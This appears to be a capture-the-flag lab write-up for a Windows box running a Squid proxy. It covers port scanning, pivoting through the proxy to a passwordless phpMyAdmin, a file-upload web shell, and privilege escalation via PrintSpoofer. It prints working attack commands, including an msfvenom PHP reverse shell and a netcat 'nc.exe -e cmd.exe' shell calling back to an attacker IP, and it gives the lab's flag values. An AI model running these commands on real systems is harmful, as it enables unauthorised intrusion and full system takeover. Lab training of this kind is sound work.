Nmap Results
# Nmap 7.92 scan initiated Thu Sep 1 17:05:22 2022 as: nmap -Pn -p- -A -T5 -oN scan.txt 192.168.57.189
Nmap scan report for 192.168.57.189
Host is up (0.079s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
3128/tcp open http-proxy Squid http proxy 4.14
|_http-title: ERROR: The requested URL could not be retrieved
|_http-server-header: squid/4.14
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: specialized|general purpose
Running (JUST GUESSING): AVtech embedded (87%), Microsoft Windows XP (85%)
OS CPE: cpe:/o:microsoft:windows_xp::sp3
Aggressive OS guesses: AVtech Room Alert 26W environmental monitor (87%), Microsoft Windows XP SP3 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
TRACEROUTE (using port 3128/tcp)
HOP RTT ADDRESS
1 79.55 ms 192.168.49.1
2 79.77 ms 192.168.57.189
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Sep 1 17:17:17 2022 -- 1 IP address (1 host up) scanned in 716.09 secondsService Enumeration
TCP/3128
Banner Grabbing
Try doing some banner grabbing:
This confirms the nmap fingerprint of Squid http proxy 4.14 . Let's check Exploit DB for any version-specific vulnerabilities.
searchsploit squidProxy Testing
HTTP Proxy Testing
Nothing for this particular version in Exploit DB. I checked Google for some exploits as well, but I'm not seeing any remote exploits available.
I stumbled across this cheat sheet in my Googling, however.
The suggestion here is that we set the Squid proxy on Kali to act as a pivot point to internal services and/or ports.
Let's see what we can do.
curl --proxy http://192.168.57.189:3128 http://192.168.57.189
Testing Nmap Proxy
Looks like we got a Squid error on that request. Let's see if we can use it as a nmap proxy.
sudo nano /etc/proxychains4.confI've commented out my other proxy option and added the Squid proxy as a HTTP proxy.
Now, let's try a nmap scan. Since we're going through a proxy, we'll have to do a full SYN scan. I'm going to use the --top-ports option, since the full SYN scans can be quite slow.
proxychains -q nmap -Pn -sT -T4 --top-ports 1000 192.168.57.189
proxychains -q nmap -Pn -sT -T4 --top-ports 1000 localhostCustom Proxy Port Scanning
All ports came back as ignored. We can also try the spose.py script here:
aancwgit clone https://github.com/aancw/spose
cd spose
python3 spose.py --proxy http://192.168.57.189:3128 --target 192.168.57.189
Testing the Proxied Services
Setting the Proxy
I am using this proxy switcher in my browser. From here, I can set the Squid proxy and navigate to the pages.
TCP/8080
The phpMyAdmin service looks interesting, let's take a look and see if there's a guessable password on that service.
Turns out, the service is configured to allow passwordless login for the root user.
Exploit
Details
Squid, acting as a reverse proxy, allows unauthenticated access to an internal Wamp server and PhpMyAdmin interface. The PhpMyAdmin interface is configured with passwordless login for the root user, allowing an attacker to create files in the web root, which can lead to code execution.
PhpMyAdmin to File Upload
262588213843476
In the PhpMyAdmin interface, you can click on the SQL tab and run the suggested payload to create a uploader.php file in the web root.
From here, you can create a PHP reverse shell payload and upload it via this web form. That will upload your reverse shell file to the web root.
Reverse Shell
Create a reverse shell payload and upload it using the web form.
msfvenom -p php/reverse_php LHOST=192.168.49.57 LPORT=443 -f raw -o shell.php
Start a listener.
sudo rlwrap nc -lnvp 443And, open http://192.168.57.189:8080/shell.php in your browser or using curl .
Upgrade Your Shell
Copy nc.exe to your current directory and serve it using smbserver.py.
cp /usr/share/windows-resources/binaries/nc.exe .
smbserver.py -smb2support -username evil -password evil evil $PWDStart a listener on another port.
sudo rlwrap nc -lnvp 80Now, from your reverse shell, execute nc.exe by using the UNC path.
net use z: \\192.168.49.57\evil /user:evil evil
Z:\nc.exe 192.168.49.57 80 -e cmd.exe
Post-Exploit Enumeration
Current User
Click to expand
USER INFORMATION
----------------
User Name SID
========================== ========
nt authority\local service S-1-5-19
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
====================================== ================ ================================================================================================ ==================================================
Mandatory Label\System Mandatory Level Label S-1-16-16384
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE Well-known group S-1-5-6 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
Unknown SID type S-1-5-32-3659434007-2290108278-1125199667-3679670526-1293081662-2164323352-1777701501-2595986263 Mandatory group, Enabled by default, Enabled group
Unknown SID type S-1-5-32-383293015-3350740429-1839969850-1819881064-1569454686-4198502490-78857879-1413643331 Mandatory group, Enabled by default, Enabled group
Unknown SID type S-1-5-32-2035927579-283314533-3422103930-3587774809-765962649-3034203285-3544878962-607181067 Mandatory group, Enabled by default, Enabled group
Unknown SID type S-1-5-32-11742800-2107441976-3443185924-4134956905-3840447964-3749968454-3843513199-670971053 Mandatory group, Enabled by default, Enabled group
Unknown SID type S-1-5-32-3523901360-1745872541-794127107-675934034-1867954868-1951917511-1111796624-2052600462 Mandatory group, Enabled by default, Enabled group
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== ========
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
ERROR: Unable to get user claims information.
OS & Kernel
Click to expand
Host Name: SQUID
OS Name: Microsoft Windows Server 2019 Standard
OS Version: 10.0.17763 N/A Build 17763
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00429-70000-00000-AA872
Original Install Date: 5/28/2021, 2:52:51 AM
System Boot Time: 7/13/2022, 9:49:25 AM
System Manufacturer: VMware, Inc.
System Model: VMware7,1
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
[01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~3094 Mhz
BIOS Version: VMware, Inc. VMW71.00V.18227214.B64.2106252220, 6/25/2021
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume2
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC-08:00) Pacific Time (US & Canada)
Total Physical Memory: 2,047 MB
Available Physical Memory: 862 MB
Virtual Memory: Max Size: 2,431 MB
Virtual Memory: Available: 1,122 MB
Virtual Memory: In Use: 1,309 MB
Page File Location(s): C:\pagefile.sys
Domain: WORKGROUP
Logon Server: N/A
Hotfix(s): 11 Hotfix(s) Installed.
[01]: KB5007295
[02]: KB4512577
[03]: KB4535680
[04]: KB4577586
[05]: KB4589208
[06]: KB5003243
[07]: KB5003711
[08]: KB5005112
[09]: KB5007206
[10]: KB5006754
[11]: KB5005701
Network Card(s): 1 NIC(s) Installed.
[01]: vmxnet3 Ethernet Adapter
Connection Name: Ethernet0 2
DHCP Enabled: No
IP address(es)
[01]: 192.168.57.189
Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.
Users
Click to expand
User accounts for \\
-------------------------------------------------------------------------------
Administrator DefaultAccount Guest
WDAGUtilityAccount
Groups
Click to expand
Aliases for \\SQUID
-------------------------------------------------------------------------------
*Access Control Assistance Operators
*Administrators
*Backup Operators
*Certificate Service DCOM Access
*Cryptographic Operators
*Device Owners
*Distributed COM Users
*Event Log Readers
*Guests
*Hyper-V Administrators
*IIS_IUSRS
*Network Configuration Operators
*Performance Log Users
*Performance Monitor Users
*Power Users
*Print Operators
*RDS Endpoint Servers
*RDS Management Servers
*RDS Remote Access Servers
*Remote Desktop Users
*Remote Management Users
*Replicator
*Storage Replica Administrators
*System Managed Accounts Group
*Users
The command completed successfully.
Network
Interfaces
Windows IP Configuration
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 192.168.57.189
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.57.254
ARP Table
N/A
Routes
N/A
Open Ports
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 876
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:3128 0.0.0.0:0 LISTENING 4824
TCP 0.0.0.0:3306 0.0.0.0:0 LISTENING 1860
TCP 0.0.0.0:5985 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:8080 0.0.0.0:0 LISTENING 1720
TCP 0.0.0.0:47001 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:49664 0.0.0.0:0 LISTENING 520
TCP 0.0.0.0:49665 0.0.0.0:0 LISTENING 60
TCP 0.0.0.0:49666 0.0.0.0:0 LISTENING 1048
TCP 0.0.0.0:49667 0.0.0.0:0 LISTENING 1620
TCP 0.0.0.0:49668 0.0.0.0:0 LISTENING 640
TCP 0.0.0.0:49672 0.0.0.0:0 LISTENING 656
TCP 192.168.57.189:139 0.0.0.0:0 LISTENING 4
TCP [::]:135 [::]:0 LISTENING 876
TCP [::]:445 [::]:0 LISTENING 4
TCP [::]:3128 [::]:0 LISTENING 4824
TCP [::]:3306 [::]:0 LISTENING 1860
TCP [::]:5985 [::]:0 LISTENING 4
TCP [::]:8080 [::]:0 LISTENING 1720
TCP [::]:47001 [::]:0 LISTENING 4
TCP [::]:49664 [::]:0 LISTENING 520
TCP [::]:49665 [::]:0 LISTENING 60
TCP [::]:49666 [::]:0 LISTENING 1048
TCP [::]:49667 [::]:0 LISTENING 1620
TCP [::]:49668 [::]:0 LISTENING 640
TCP [::]:49672 [::]:0 LISTENING 656
Ping Sweep
N/A
Processes
Click to expand
No interesting processes.
Services
Click to expand
No interesting services, unquoted service paths.
Scheduled Tasks
Click to expand
N/A
Privilege Escalation
After a lengthy amount of enumeration, I could not find any privileged services that could lead to a local privilege escalation. So, I turned to Google and I came across this very informative blog post.
The author has developed a local exploit that will streamline the process of regaining all of the privileges that service accounts used to come with.
itm4nAfter running the exploit, our service account now has SeImpersonatePrivilege enabled.
From here, I Googled for SeImpersonatePrivilege to SYSTEM.
Julian Bonpland Mignaquy Updated September 24, 2021 11:36
Again, itm4n with the good stuff.
itm4nI host the PrintSpoofer64.exe on smbserver.py from before and execute.
Flags
C:\local.txt
6e071bbf55ee86b2c1691a3a8ae47c29
C:\Users\Administrator\Desktop\proof.txt
657c9d2fb8898397fbffbffba1a42e7a
